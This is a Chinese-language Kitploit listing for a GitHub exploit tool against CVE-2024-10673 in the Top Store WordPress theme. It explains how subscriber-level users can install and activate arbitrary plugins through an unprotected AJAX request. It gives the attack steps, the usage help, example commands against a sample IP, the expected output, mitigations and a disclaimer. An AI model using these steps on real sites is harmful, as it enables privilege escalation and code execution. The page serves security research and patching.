Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-10673 — Top Store <= 1.5.4 - 已认证(订阅者+)任意插件安装/激活 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-10673
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubnxploited/cve-2024-10673

CVE-2024-10673

Top Store <= 1.5.4 - 已认证(订阅者+)任意插件安装/激活

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔥 概述

该脚本利用 CVE-2024-10673,这是 Top Store WordPress 主题(<= 1.5.4) 中发现的一个严重漏洞。该漏洞允许拥有订阅者(subscriber)级别或更高权限的已认证用户通过未受保护的 AJAX 请求安装和激活任意插件。

⚠️ 严重性与影响

  • 无需管理员认证的插件安装:拥有订阅者权限的攻击者无需管理员批准即可安装插件。
  • 远程代码执行(RCE)可能性:如果安装了恶意插件,攻击者可能执行任意代码。
  • 权限提升:攻击者可以安装授予其管理访问权限的插件。

🛠️ 此 Exploit 的功能

  • 自动化攻击:动态提取所需的 nonce。
  • 支持插件选择(用户可以指定要安装和激活的插件)。
  • 支持 JSON 格式的响应,用于结构化日志记录。
  • 优雅地处理错误,确保稳健执行。

⚡ Exploit 工作原理

  1. 使用有效凭据登录 WordPress。
  2. 从 themes.php?page=thunk_started 提取 AJAX nonce。
  3. 发送 AJAX 请求以安装插件(默认:hunk-companion 或用户自定义插件)。
  4. 发送另一个请求以激活插件。
  5. 输出 JSON 响应,指示成功或失败。

🚀 使用方法

root@kitploit:~
usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin slug to install and activate (default: hunk-companion)

示例

  • 安装并激活默认插件(hunk-companion):
    root@kitploit:~
    python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    
  • 安装并激活指定插件(woocommerce):
    root@kitploit:~
    python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
    

📝 预期输出

root@kitploit:~
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}

🔒 缓解措施

为确保您的 WordPress 站点安全:

  • 将 Top Store 主题更新到已修补的版本。
  • 限制订阅者权限,以防止不必要的访问。
  • 监控已安装的插件,以便及时发现未经授权的更改。
  • 禁止非管理员安装插件。

⚠️ 免责声明

此脚本仅用于教育和安全研究目的。 未经授权对您不拥有或未经明确许可测试的系统使用是违法的。请负责任地使用!

作者:Khaled Alenazi(Nxploit)

下载工具